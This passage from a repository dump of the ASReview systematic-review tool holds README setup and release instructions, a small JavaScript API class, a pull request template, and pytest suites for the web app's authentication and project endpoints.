interactively or by using a JSON string to bulk insert the accounts. To add user accounts interactively run the following command:\n```\n$ asreview auth-tool add-users --db-path ~/.asreview/asreview.production.sqlite\n```\n\nNote that the absolute path of the sqlite database has to be provided. Also note that if your app runs in development mode, use the `asreview.development.sqlite` database instead. The tool will prompt you if you would like to add a user account. Type `Y` to continue and enter an email address, name, affiliation (not required) and a password for every person.
Continue to add as many users as you would like.\n\nIf you would like to bulk insert user accounts use the `--json` option:\n```\n$ asreview auth-tool add-users -j \"[{\\\"email\\\": \\\"[email protected]\\\", \\\"name\\\": \\\"Name of User\\\", \\\"affiliation\\\": \\\"Some Place\\\", \\\"password\\\": \\\"1234@ABcd\\\"}]\" --db-path ~/.asreview/asreview.production.sqlite\n```\nThe JSON string represents a Python list with a dictionary for every user account with the following keys: `email`, `name`, `affiliation` and `password`. Note that passwords require at least one symbol. These symbols, such as the exclamation mark, may compromise the integrity of the JSON string.\n\n#### Preparing the projects\n\nAfter creating the user accounts, the existing projects must be stored and linked to a user account in the database. The tool provides the `list-projects` command to prepare for this step in case you would like to bulk store all projects. Ignore the following commands if you prefer to store all projects interactively. \n\nWithout a flag, the command lists all projects:\n```\n$ asreview auth-tool list-projects\n```\nIf you add the `--json` flag:\n```\n$ asreview auth-tool list-projects --json\n```\nthe tool returns a convenient JSON string that can be used to bulk insert and link projects into the database. The string represents a Python list containing a dictionary for every project. Since the ID of the user account of \nthe owner is initially unknown, the `0` behind every `owner_id` key needs to be replaced with the appropriate owner ID. That ID number can be found if we list all user accounts with the following command:\n```\n$ asreview auth-tool list-users --db-path ~/.asreview/asreview.production.sqlite\n```\n\n#### Inserting and linking the projects into the database\n\nInserting and linking the projects into the database can be done interactively:\n```\n$ asreview auth-tool link-projects --db-path ~/.asreview/asreview.production.sqlite\n```\nThe tool will list project by project and asks what the ID of the owner is. That ID can be found in the user list below the project information.\n\nOne can also insert all project information by using the JSON string that was produced in the previous step:\n```\n$ asreview auth-tool link-projects --json \"[{\\\"folder\\\": \\\"project-id\\\", \\\"version\\\": \\\"1.1+51.g0ebdb0c.dirty\\\", \\\"project_id\\\": \\\"project-id\\\", \\\"name\\\": \\\"project 1\\\", \\\"authors\\\": \\\"Authors\\\", \\\"created\\\": \\\"2023-04-12 21:23:28.625859\\\", \\\"owner_id\\\": 15}]\" --db-path ~/.asreview/asreview.production.sqlite\n``` \n\n## Documentation\n\n### Sphinx docs\n\nDocumentation for the ASReview project is available on https://asreview.readthedocs.io/en/latest/.\nThe source files are available in the [`docs`](/docs) folder of this repository. The project makes\nuse of [Sphinx](https://www.sphinx-doc.org/) to convert the source files and docstrings into HTML\nor PDF files.\n\nInstall the dependencies for rendering the documentation with\n\n```\npip install -r docs/requirements.txt\n```\n\nNavigate into the `docs` folder and render the documentation (the HTML version) with\n\n```\nmake html\n```\n\nOpen the file `docs/build/html/index.html` in your web browser.\n\n### Broken links\n\nNavigate into the `docs` folder and check for broken links with:\n\n```\nmake linkcheck\n```\n\nExtra information: https://www.writethedocs.org/guide/tools/testing/#link-testing\n\n### Screenshots\n\nScreenshots are an important part of the ASReview documentation. 
When contributing screenshots,\nfollow the guidelines below.\n\n1. Open Developers Tools in your browser (e.g. Chrome or Firefox).\n2. Set device dimensions to **1280x800**.\n3. Capture screenshot with internal screenshot tool (preferred, see [example](https://www.deconetwork.com/blog/how-to-take-full-webpage-screenshots-instantly/)).\n4. [OPTIONAL] Crop relevant part. Keep ratio if possible.\n5. Resize image to **1280x800** maximum and **960x600** minimum.\n6. [OPTIONAL] Use a red box to highlight relevant components.\n\n## EXPERIMENTAL: One Click Deploy for ASReview LAB\n\nYou can deploy ASReview LAB right now in one click on any of these clouds providers:\n\n[<img src=\"https://aka.ms/deploytoazurebutton\" height=\"30px\">](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Fasreview%2Fasreview%2Fmaster%2Fazuredeploy.json)\n[<img src=\"https://deploy.cloud.run/button.svg\" height=\"30px\">](https://deploy.cloud.run)\n[<img src=\"https://www.herokucdn.com/deploy/button.svg\" height=\"30px\">](https://heroku.com/deploy?template=https://github.com/asreview/asreview/tree/master)\n\n❗❗❗ ASReview doesn't have builtin authentication. You are responsible for the authentication and security of the server yourself.\n\n\n## Release instructions\n\n### Docker\n\nA Docker image is created when a tag or a commit to `master` is pushed.\nThe workflow `docker.yml` builds images for platforms `linux/amd64` and `linux/arm64`.\nIf, for some reason, the image is not built, you can build manually with the commands below.\nFind the manual instructions at <https://docs.docker.com/docker-hub/> and <https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-container-registry>.\nReplace the version numbers below by the version you want to push.\n\nASReview LAB\n```\ndocker build -t asreview/asreview .\ndocker build -t asreview/asreview:1.0 .\ndocker push ghcr.io/asreview/asreview\ndocker push ghcr.io/asreview/asreview:1.0\n```\n\nIf you are creating a Docker container that runs the app with a [config file](#full-configuration) do __not forget__ to override the IP-address of the Flask backend. 
Set the HOST variable to \"0.0.0.0\" since the default \"localhost\" can't be reached from outside the container.\n" }, { "alpha_fraction": 0.5409836173057556, "alphanum_fraction": 0.5409836173057556, "avg_line_length": 22.238094329833984, "blob_id": "ce696fbd9c96478a7f82d9946ef724a16855b3b6", "content_id": "22b08b5ad6289f7485012a3edd268a68b800f06d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 488, "license_type": "permissive", "max_line_length": 56, "num_lines": 21, "path": "/asreview/webapp/src/api/BaseAPI.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { axiosErrorHandler } from \"./axiosErrorHandler\";\nimport { base_url } from \"../globals.js\";\nimport axios from \"axios\";\n\nclass BaseAPI {\n  static boot = ({ queryKey }) => {\n    const url = base_url + `boot`;\n    return new Promise((resolve, reject) => {\n      axios\n        .get(url)\n        .then((result) => {\n          resolve(result[\"data\"]);\n        })\n        .catch((error) => {\n          reject(axiosErrorHandler(error));\n        });\n    });\n  };\n}\n\nexport default BaseAPI;\n" }, { "alpha_fraction": 0.7245283126831055, "alphanum_fraction": 0.7245283126831055, "avg_line_length": 18.928571701049805, "blob_id": "7c67c22e2d5b6cd306eb2b7c13201fe9e375b32b", "content_id": "bd6559d2ff2a419d71dcdb612d54c5738f0fbd9b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 265, "license_type": "permissive", "max_line_length": 57, "num_lines": 14, "path": "/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Changes proposed in this pull request:\n\n-\n-\n-\n\n*Add screenshots for proposed visual changes*\n\n\n**Checklist**\n\n- [ ] Unit tests are added for new features and bug fixes\n- [ ] Documentation is added for new features\n- [ ] Title of the pull request is self-explaining\n" }, { "alpha_fraction": 0.6505531072616577, "alphanum_fraction": 0.6630530953407288, "avg_line_length": 32.053016662597656, "blob_id": "94072723403763be0f6aaad935b89bfddd674e32", "content_id": "762a53d7b58e41d3dd8fd426af9fa5c1b00b92ab", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18080, "license_type": "permissive", "max_line_length": 87, "num_lines": 547, "path": "/asreview/webapp/tests/test_api/test_auth.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import datetime as dt\nfrom inspect import getfullargspec\n\nimport pytest\n\nimport asreview.webapp.tests.utils.api_utils as au\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\nfrom asreview.webapp.tests.utils.config_parser import get_user\n\n# ###################\n# SIGNUP\n# ###################\n\n\n# test that creating a user when the app runs a no-creation\n# policy is impossible\ndef test_impossible_to_signup_when_not_allowed(client_auth_no_creation):\n    # get user data\n    user = get_user(1)\n    # post form data\n    status_code, data = au.signup_user(client_auth_no_creation, user)\n    # check if we get a 400 status\n    assert status_code == 400\n    assert data[\"message\"] == \"The app is not configured to create accounts\"\n\n\n# Successful signup returns a 201 but with an unconfirmed user and\n# an email token\ndef test_successful_signup_confirmed(client_auth_verified):\n    # get user data\n    user = get_user(1)\n    # post form data\n    status_code, data = au.signup_user(client_auth_verified,
user)\n    # check if we get a 201 status\n    assert status_code == 201\n    assert (\n        data[\"message\"]\n        == f\"An email has been sent to {user.email} \"\n        + \"to verify your account. Please follow instructions.\"\n    )\n\n\n# test basic signing up\ndef test_successful_signup_no_confirmation(client_auth):\n    # get user data\n    user = get_user(1)\n    # post form data\n    status_code, data = au.signup_user(client_auth, user)\n    # check if we get a 201 status\n    assert status_code == 201\n    assert data[\"message\"] == f'User \"{user.email}\" created.'\n\n\n# Adding an existing identifier must return a 403 status and an\n# appropriate message\ndef test_unique_identifier(client_auth):\n    # get user data\n    user = get_user(1)\n    # insert this user\n    crud.create_user(DB, user)\n    # try to create the same user again with the api\n    status_code, data = au.signup_user(client_auth, user)\n    assert status_code == 403\n    assert data[\"message\"] == f'User with email \"{user.email}\" already exists.'\n\n\n# Adding an existing email must return a 403 status and an\n# appropriate message\ndef test_unique_email(client_auth):\n    # get user data\n    user1 = get_user(1)\n    user2 = get_user(2)\n    # insert user1\n    crud.create_user(DB, user1)\n    # try to create user2 with the same email as user1 via the api\n    user2.email = user1.email\n    status_code, data = au.signup_user(client_auth, user2)\n    assert status_code == 403\n    assert data[\"message\"] == f'User with email \"{user2.email}\" already exists.'\n\n\n# ###################\n# SIGNIN\n# ###################\n\n\n# Verified user creation: a user cannot sign in with an unconfirmed account\ndef test_unsuccessful_signin_with_unconfirmed_account(client_auth_verified):\n    # get user data\n    user = get_user(1)\n    # create user with signup\n    status_code, data = au.signup_user(client_auth_verified, user)\n    # check if we get a 201 status\n    assert status_code == 201\n    # try to sign in\n    status_code, data = au.signin_user(client_auth_verified, user)\n    assert status_code == 404\n    assert data[\"message\"] == f\"User account {user.email} is not confirmed.\"\n\n\n# Successfully signing in a user must return a 200 response\ndef test_successful_signin(client_auth):\n    # get user data\n    user = get_user(1)\n    # create user with signup, no confirmation\n    status_code, data = au.signup_user(client_auth, user)\n    # check if we get a 201 status\n    assert status_code == 201\n    # signin\n    status_code, data = au.signin_user(client_auth, user)\n    assert status_code == 200\n    assert data[\"message\"] == f\"User {user.identifier} is logged in.\"\n\n\n# A wrong password must return a 404 response and an appropriate message\ndef test_unsuccessful_signin_wrong_password(client_auth):\n    # get user data\n    user = get_user(1)\n    # create user with signup, no confirmation\n    status_code, data = au.signup_user(client_auth, user)\n    # check if we get a 201 status\n    assert status_code == 201\n    # change password\n    user.password = \"wrong_password\"\n    # signin\n    status_code, data = au.signin_user(client_auth, user)\n    assert status_code == 404\n    assert data[\"message\"] == f\"Incorrect password for user {user.identifier}.\"\n\n\n# A wrong email must return a 404 response and an appropriate message\ndef test_unsuccessful_signin_wrong_email(client_auth):\n    # get user data\n    user = get_user(1)\n    # create user with signup, no confirmation\n    status_code, data = au.signup_user(client_auth, user)\n    # check if we get a 201 status\n    assert status_code == 201\n    # change email and identifier\n    user.email = \"[email
protected]\"\n # signin\n status_code, data = au.signin_user(client_auth, user)\n assert status_code == 404\n assert data[\"message\"] == f\"User account {user.identifier} does not exist.\"\n\n\n# ###################\n# SIGNOUT\n# ###################\n\n\n# Signing out must return a 200 status and an appropriate message\ndef test_signout(client_auth):\n # create user\n user = au.create_and_signin_user(client_auth)\n # signout\n status_code, data = au.signout_user(client_auth)\n # expect a 200\n assert status_code == 200\n assert (\n data[\"message\"]\n == f\"User with identifier {user.identifier} has been signed out.\"\n )\n\n\n# ###################\n# CONFIRMATION\n# ###################\n\n\n# A new token is created on signup, that token is can be confirmed\n# by the confirm route\ndef test_token_confirmation_after_signup(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # refresh user\n user = crud.get_user_by_identifier(user.identifier)\n # now we confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 200\n assert data[\"message\"] == f\"User {user.identifier} confirmed.\"\n\n\n# A token expires in 24 hours, test confirmation response after\n# 24 hours\ndef test_expired_token(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # refresh user\n user = crud.get_user_by_identifier(user.identifier)\n # manipulate token_created_at\n new_created_at = user.token_created_at - dt.timedelta(hours=28)\n user.token_created_at = new_created_at\n DB.session.commit()\n # now we try to confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 403\n assert \"token has expired\" in data[\"message\"]\n\n\n# Confirmation user: if the user can't be found, this route should\n# return a 404\ndef test_if_this_route_returns_404_user_not_found(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # make sure the user account is created\n assert crud.count_users() == 1\n # we keep the user model as is, not retrieving it from the DB\n # which ensures an id-less object that can be manipulated\n user.id = 100\n # now we try to confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 404\n assert data[\"message\"] == \"No user account / correct token found.\"\n\n\n# If the token cant be found, this route should return a 404\ndef test_if_this_route_returns_404_token_not_found(client_auth_verified):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth_verified, user)\n # make sure the user account is created\n assert crud.count_users() == 1\n # we keep the user model as is, not retrieving it from the DB\n # which ensures an id-less object that can be manipulated\n user.token = \"wrong_token\"\n # now we try to confirm this user\n status_code, data = au.confirm_user(client_auth_verified, user)\n assert status_code == 404\n assert data[\"message\"] == \"No user account / correct token found.\"\n\n\n# If we are not doing verification this route should return a 400\ndef test_confirm_route_returns_400_if_app_not_verified(client_auth):\n # signup user\n user = get_user(1)\n status_code, data = au.signup_user(client_auth, user)\n # refresh user object\n user = crud.get_user_by_identifier(user.identifier)\n # now we try to 
confirm this user\n    status_code, data = au.confirm_user(client_auth, user)\n    assert status_code == 400\n    assert data[\"message\"] == \"The app is not configured to verify accounts.\"\n\n\n# ###################\n# PROFILE\n# ###################\n\n\n# Test the user data if we request it\[email protected](\n    \"attribute\", [\"email\", \"identifier\", \"name\", \"origin\", \"affiliation\"]\n)\ndef test_get_profile(client_auth, attribute):\n    user = au.create_and_signin_user(client_auth)\n    # get profile\n    status_code, data = au.get_profile(client_auth)\n    assert status_code == 200\n    # assert that none of the attributes is blank\n    assert data[\"message\"][attribute] != \"\"\n    # compare with user\n    assert data[\"message\"][attribute] == getattr(user, attribute)\n\n\n# Test profile data not returned when the user id does not exist\ndef test_get_profile_if_user_id_does_not_exist(client_auth):\n    au.create_and_signin_user(client_auth)\n    # remove this user from the database\n    crud.delete_users(DB)\n    # get profile\n    status_code, data = au.get_profile(client_auth)\n    assert status_code == 404\n    assert data[\"message\"] == \"No user found.\"\n\n\n# #####################\n# FORGOT/RESET PASSWORD\n# #####################\n\n\n# Test forgot_password can't be called if we don't run an\n# email config\ndef test_forgot_password_no_email_config(client_auth):\n    # signup user\n    user = get_user(1)\n    status_code, data = au.signup_user(client_auth, user)\n    # forgot password\n    status_code, data = au.forgot_password(client_auth, user)\n    assert status_code == 404\n    assert data[\"message\"] == \"Forgot-password feature is not used in this app.\"\n\n\n# Test forgot_password works under normal circumstances\ndef test_forgot_password_works(client_auth_verified):\n    # signup user\n    user = get_user(1)\n    status_code, data = au.signup_user(client_auth_verified, user)\n    # forgot password\n    status_code, data = au.forgot_password(client_auth_verified, user)\n    assert status_code == 200\n    assert data[\"message\"] == f\"An email has been sent to {user.email}\"\n\n\n# Test forgot_password: user not found\ndef test_forgot_password_no_user(client_auth_verified):\n    # get user, no signup\n    user = get_user(1)\n    # forgot password\n    status_code, data = au.forgot_password(client_auth_verified, user)\n    assert status_code == 404\n    assert data[\"message\"] == f'User with email \"{user.email}\" not found.'\n\n\n# Test forgot_password: origin is not \"asreview\"\ndef test_forgot_password_wrong_origin(client_auth_verified):\n    # signup user\n    user = get_user(1)\n    status_code, data = au.signup_user(client_auth_verified, user)\n    # get fresh user object and change origin\n    user = crud.update_user(DB, user, \"origin\", \"github\")\n    # forgot password\n    status_code, data = au.forgot_password(client_auth_verified, user)\n    assert status_code == 404\n    assert data[\"message\"] == f\"Your account has been created with {user.origin}.\"\n\n\n# Test resetting the password when the app is not configured for it\ndef test_reset_password_no_email_config(client_auth):\n    # signup user\n    user = get_user(1)\n    status_code, data = au.signup_user(client_auth, user)\n    # get user\n    user = crud.get_user_by_identifier(user.identifier)\n    user.password = \"NewPassword123!\"\n    # reset password\n    status_code, data = au.reset_password(client_auth, user)\n    assert status_code == 404\n    assert data[\"message\"] == \"Reset-password feature is not used in this app.\"\n\n\n# Test resetting password\ndef test_reset_password(client_auth_verified):\n    # signup user\n    user = get_user(1)\n    au.signup_user(client_auth_verified, user)\n    # forgot 
password\n    au.forgot_password(client_auth_verified, user)\n    # get user and provide new password\n    user = crud.get_user_by_identifier(user.identifier)\n    user.password = \"NewPassword123!\"\n    # reset it\n    status_code, data = au.reset_password(client_auth_verified, user)\n    assert status_code == 200\n    assert data[\"message\"] == \"Password updated.\"\n\n\n# Test reset password: id not found\ndef test_reset_password_with_wrong_user_id(client_auth_verified):\n    # signup user\n    user = get_user(1)\n    au.signup_user(client_auth_verified, user)\n    # forgot password\n    au.forgot_password(client_auth_verified, user)\n    # get user and provide new password\n    user = crud.get_user_by_identifier(user.identifier)\n    user.password = \"NewPassword123!\"\n    # and remove the user from the database to trigger user-not-found\n    crud.delete_users(DB)\n    # reset it\n    status_code, data = au.reset_password(client_auth_verified, user)\n    assert status_code == 404\n    assert (\n        data[\"message\"]\n        == \"User not found, try restarting the forgot-password procedure.\"\n    )\n\n\n# Test reset password: token is stale\ndef test_reset_password_with_stale_token(client_auth_verified):\n    # signup user\n    user = get_user(1)\n    au.signup_user(client_auth_verified, user)\n    # forgot password\n    au.forgot_password(client_auth_verified, user)\n    # get user and provide new password\n    user = crud.get_user_by_identifier(user.identifier)\n    user.password = \"NewPassword123!\"\n    new_created_at = user.token_created_at - dt.timedelta(hours=28)\n    user.token_created_at = new_created_at\n    DB.session.commit()\n    # reset password\n    status_code, data = au.reset_password(client_auth_verified, user)\n    assert status_code == 404\n    assert (\n        data[\"message\"]\n        == \"Token is invalid or too old, restart the forgot-password procedure.\"\n    )\n\n\n# Test reset password: invalid password\ndef test_reset_password_with_invalid_password(client_auth_verified):\n    # signup user\n    user = get_user(1)\n    au.signup_user(client_auth_verified, user)\n    # forgot password\n    au.forgot_password(client_auth_verified, user)\n    # get user and provide new password\n    user = crud.get_user_by_identifier(user.identifier)\n    user.password = \"123\"\n    # reset password\n    status_code, data = au.reset_password(client_auth_verified, user)\n    assert status_code == 500\n    assert \"Unable to reset your password!\" in data[\"message\"]\n    assert \"does not meet requirements\" in data[\"message\"]\n\n\n# ###################\n# UPDATE USER PROFILE\n# ###################\n\n\n# test updating normal attributes from user profile\ndef test_update_user_profile_simple_attributes(client_auth):\n    # create and signin user\n    user = au.create_and_signin_user(client_auth)\n    # prep data\n    data = {\n        \"email\": \"[email protected]\",\n        \"name\": \"new_name\",\n        \"affiliation\": \"new_affiliation\",\n        \"public\": int(not user.public),\n    }\n    # call update\n    status_code, data = au.update_user(client_auth, data)\n    assert status_code == 200\n    assert data[\"message\"] == \"User profile updated.\"\n\n\n# test updating the password\ndef test_update_password(client_auth):\n    # create and signin user\n    user = au.create_and_signin_user(client_auth)\n    # prep data\n    new_password = \"NewPassword123#\"\n    data = {\n        \"email\": user.email,\n        \"name\": user.name,\n        \"affiliation\": user.affiliation,\n        \"public\": int(user.public),\n        \"password\": new_password,\n    }\n    # call update\n    status_code, data = au.update_user(client_auth, data)\n    assert status_code == 200\n    assert data[\"message\"] == \"User profile updated.\"\n    # check if the new password works: signout first\n    au.signout_user(client_auth)\n    # signin with new password\n    
user.password = new_password\n status_code, data = au.signin_user(client_auth, user)\n assert status_code == 200\n\n\n# test updating wrong new attribute values\[email protected](\n \"attribute_data\",\n [\n (\"email\", \"email\"),\n (\"email\", \"[email protected]\"),\n (\"name\", \"\"),\n (\"password\", \"abc\"),\n ],\n)\ndef test_update_user_with_wrong_values(client_auth, attribute_data):\n # make sure I have another user to test email duplication\n user = crud.create_user(DB, 2)\n # get attribute and value from parametrize\n attr, wrong_value = attribute_data\n # create user and signin user\n user = au.create_and_signin_user(client_auth)\n data = {\n \"email\": user.email,\n \"name\": user.name,\n \"affiliation\": user.affiliation,\n \"public\": int(user.public),\n \"password\": \"ABcd!1234\", # valid password\n }\n # manipulate attribute\n data[attr] = wrong_value\n # update\n status_code, data = au.update_user(client_auth, data)\n assert status_code == 500\n assert \"Unable to update your profile\" in data[\"message\"]\n assert (attr.capitalize() in data[\"message\"]) or attr in data[\"message\"]\n\n\n# ###################\n# REFRESH\n# ###################\n\n\n# Test refresh: user signed in\ndef test_refresh_with_signed_in_user(client_auth):\n # create and signin user\n user = au.create_and_signin_user(client_auth)\n # refresh\n status_code, data = au.refresh(client_auth)\n assert status_code == 200\n assert data[\"id\"] == user.id\n assert data[\"logged_in\"] is True\n assert data[\"name\"] == user.name\n\n\n# Test refresh: user NOT signed in\ndef test_refresh_with_signed_out_user(client_auth):\n # create and signin user\n au.create_and_signin_user(client_auth)\n # signout\n au.signout_user(client_auth)\n # refresh\n status_code, data = au.refresh(client_auth)\n assert status_code == 200\n assert data[\"id\"] is None\n assert data[\"logged_in\"] is False\n assert data[\"name\"] == \"\"\n\n\n# ###################\n# TEST LOGIN REQUIRED\n# ###################\n\n\n# User must be logged in, in order to signout,\n# we expect an error if we sign out if not signed in\[email protected](\"api_call\", [au.signout_user, au.get_profile, au.update_user])\ndef test_must_be_signed_in_to_signout(client_auth, api_call):\n if len(getfullargspec(api_call).args) == 1:\n status_code, data = api_call(client_auth)\n else:\n status_code, data = api_call(client_auth, {})\n # asserts\n assert status_code == 401\n assert data[\"message\"] == \"Login required.\"\n" }, { "alpha_fraction": 0.6540408730506897, "alphanum_fraction": 0.6636806130409241, "avg_line_length": 32.89439010620117, "blob_id": "1d7aca8cfa00e77645067377353167bf5c7d6c0e", "content_id": "d1a9859b6ad5a2d304c0bd6331182d2083027734", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20540, "license_type": "permissive", "max_line_length": 84, "num_lines": 606, "path": "/asreview/webapp/tests/test_api/test_projects.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import inspect\nimport time\nfrom typing import Union\n\nimport pytest\nfrom flask.testing import FlaskClient\n\nimport asreview.webapp.tests.utils.api_utils as au\nimport asreview.webapp.tests.utils.crud as crud\nimport asreview.webapp.tests.utils.misc as misc\nfrom asreview.project import ASReviewProject\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.tests.utils.misc import current_app_is_authenticated\nfrom 
asreview.webapp.tests.utils.misc import retrieve_project_url_github\n\n# NOTE: I don't see a plugin that can be used for testing\n# purposes\nUPLOAD_DATA = [\n {\"benchmark\": \"benchmark:Hall_2012\"},\n {\n \"url\": \"https://raw.githubusercontent.com/asreview/\"\n + \"asreview/master/tests/demo_data/generic_labels.csv\"\n },\n]\nIMPORT_PROJECT_URLS = retrieve_project_url_github()\n\n# NOTE: the setup fixture entails: a FlaskClient, 1 user (signed in),\n# and a project of this user OR a project from an unauthenticated app.\n# The fixture is parametrized! It runs the authenticated app and the\n# unauthenticated app.\n\n\n# Test getting all projects\ndef test_get_projects(setup):\n client, user1, project = setup\n status_code, data = au.get_all_projects(client)\n assert status_code == 200\n assert len(data[\"result\"]) == 1\n found_project = data[\"result\"][0]\n if current_app_is_authenticated():\n assert found_project[\"id\"] == project.project_id\n assert found_project[\"owner_id\"] == user1.id\n else:\n assert found_project[\"id\"] == project.config[\"id\"]\n\n\n# Test create a project\ndef test_create_projects(setup):\n client, _, _ = setup\n project_name = \"new_project\"\n\n status_code, data = au.create_project(client, project_name)\n assert status_code == 201\n assert data[\"name\"] == project_name\n\n\n# Test upgrading a post v0.x project\ndef test_try_upgrade_a_modern_project(setup):\n client, _, project = setup\n # verify version\n data = misc.read_project_file(project)\n assert not data[\"version\"].startswith(\"0\")\n\n status_code, data = au.upgrade_project(client, project)\n assert status_code == 400\n assert data[\"message\"] == \"Can only convert v0.x projects.\"\n\n\n# Test upgrading a v0.x project\ndef test_upgrade_an_old_project(setup):\n client, user, _ = setup\n # get an old version from github\n old_project_url = retrieve_project_url_github(\"v0.19\")\n project = misc.copy_github_project_into_asreview_folder(old_project_url)\n # we need to make sure this new, old-style project can be found\n # under current user if the app is authenticated\n if current_app_is_authenticated():\n new_project = Project(project_id=project.config.get(\"id\"))\n project = crud.create_project(DB, user, new_project)\n print(type(project))\n # try to convert\n status_code, data = au.upgrade_project(client, project)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test importing old projects, verify ids\[email protected](\"url\", IMPORT_PROJECT_URLS)\ndef test_import_project_files(setup, url):\n client, user, first_project = setup\n # import project\n status_code, data = au.import_project(client, url)\n # get contents asreview folder\n folders = set(misc.get_folders_in_asreview_path())\n # asserts\n assert len(folders) == 2\n assert status_code == 200\n assert isinstance(data, dict)\n if current_app_is_authenticated():\n # assert it exists in the database\n assert crud.count_projects() == 2\n project = crud.last_project()\n assert data[\"id\"] != first_project.project_id\n assert data[\"id\"] == project.project_id\n # assert the owner is current user\n assert data[\"owner_id\"] == user.id\n else:\n assert data[\"id\"] != first_project.config.get(\"id\")\n # in auth/non-auth the project folder must exist in the asreview folder\n assert data[\"id\"] in set([f.stem for f in folders])\n\n\n# Test get stats in setup state\ndef test_get_projects_stats_setup_stage(setup):\n client, _, _ = setup\n status_code, data = au.get_project_stats(client)\n assert status_code == 200\n assert 
isinstance(data[\"result\"], dict)\n assert data[\"result\"][\"n_in_review\"] == 0\n assert data[\"result\"][\"n_finished\"] == 0\n assert data[\"result\"][\"n_setup\"] == 1\n\n\n# Test get stats in review state\ndef test_get_projects_stats_review_stage(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get stats\n status_code, data = au.get_project_stats(client)\n assert status_code == 200\n assert isinstance(data[\"result\"], dict)\n assert data[\"result\"][\"n_in_review\"] == 1\n assert data[\"result\"][\"n_finished\"] == 0\n assert data[\"result\"][\"n_setup\"] == 0\n\n\n# Test get stats in finished state\ndef test_get_projects_stats_finished_stage(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # manually finish the project\n au.set_project_status(client, project, \"finished\")\n # get stats\n status_code, data = au.get_project_stats(client)\n assert status_code == 200\n assert isinstance(data[\"result\"], dict)\n assert data[\"result\"][\"n_in_review\"] == 0\n assert data[\"result\"][\"n_finished\"] == 1\n assert data[\"result\"][\"n_setup\"] == 0\n\n\n# Test known demo data\[email protected](\"subset\", [\"plugin\", \"benchmark\"])\ndef test_demo_data_project(setup, subset):\n client, _, _ = setup\n status_code, data = au.get_demo_data(client, subset)\n assert status_code == 200\n assert isinstance(data[\"result\"], list)\n\n\n# Test unknown demo data\ndef test_unknown_demo_data_project(setup):\n client, _, _ = setup\n status_code, data = au.get_demo_data(client, \"abcdefg\")\n assert status_code == 400\n assert data[\"message\"] == \"demo-data-loading-failed\"\n\n\n# Test uploading benchmark data to a project\[email protected](\"upload_data\", UPLOAD_DATA)\ndef test_upload_benchmark_data_to_project(setup, upload_data):\n client, _, project = setup\n status_code, data = au.upload_data_to_project(client, project, data=upload_data)\n assert status_code == 200\n if current_app_is_authenticated():\n assert data[\"project_id\"] == project.project_id\n else:\n assert data[\"project_id\"] == project.config.get(\"id\")\n\n\n# Test getting the data after an upload\[email protected](\"upload_data\", UPLOAD_DATA)\ndef test_get_project_data(setup, upload_data):\n client, _, project = setup\n au.upload_data_to_project(client, project, data=upload_data)\n status_code, data = au.get_project_data(client, project)\n assert status_code == 200\n assert data[\"filename\"] == misc.extract_filename_stem(upload_data)\n\n\n# Test get dataset writer\ndef test_get_dataset_writer(setup):\n client, _, project = setup\n # upload data\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # get dataset writer\n status_code, data = au.get_project_dataset_writer(client, project)\n assert status_code == 200\n assert isinstance(data[\"result\"], list)\n\n\n# Test updating a project\ndef test_update_project_info(setup):\n client, _, project = setup\n # update data\n new_mode = \"oracle\"\n new_name = \"new name\"\n new_authors = \"new authors\"\n new_description = \"new description\"\n # request\n status_code, data = au.update_project(\n client,\n project,\n name=new_name,\n mode=new_mode,\n authors=new_authors,\n description=new_description,\n )\n assert status_code == 200\n assert data[\"authors\"] == new_authors\n assert data[\"description\"] == new_description\n assert data[\"mode\"] == new_mode\n assert data[\"name\"] == new_name\n\n\n# Test 
search data\ndef test_search_data(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # search\n status_code, data = au.search_project_data(\n client, project, query=\"Software&n_max=10\"\n )\n assert status_code == 200\n assert \"result\" in data\n assert isinstance(data[\"result\"], list)\n assert len(data[\"result\"]) <= 10\n\n\n# Test get a selection of random papers to find exclusions\ndef test_random_prior_papers(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # get random selection\n status_code, data = au.get_prior_random_project_data(client, project)\n assert status_code == 200\n assert \"result\" in data\n assert isinstance(data[\"result\"], list)\n assert len(data[\"result\"]) > 0\n\n\n# Test labeling of prior data\[email protected](\"label\", [0, 1])\ndef test_label_item(setup, label):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label\n status_code, data = au.label_random_project_data_record(client, project, label)\n assert status_code == 200\n assert data[\"success\"]\n\n\n# Test getting labeled records\ndef 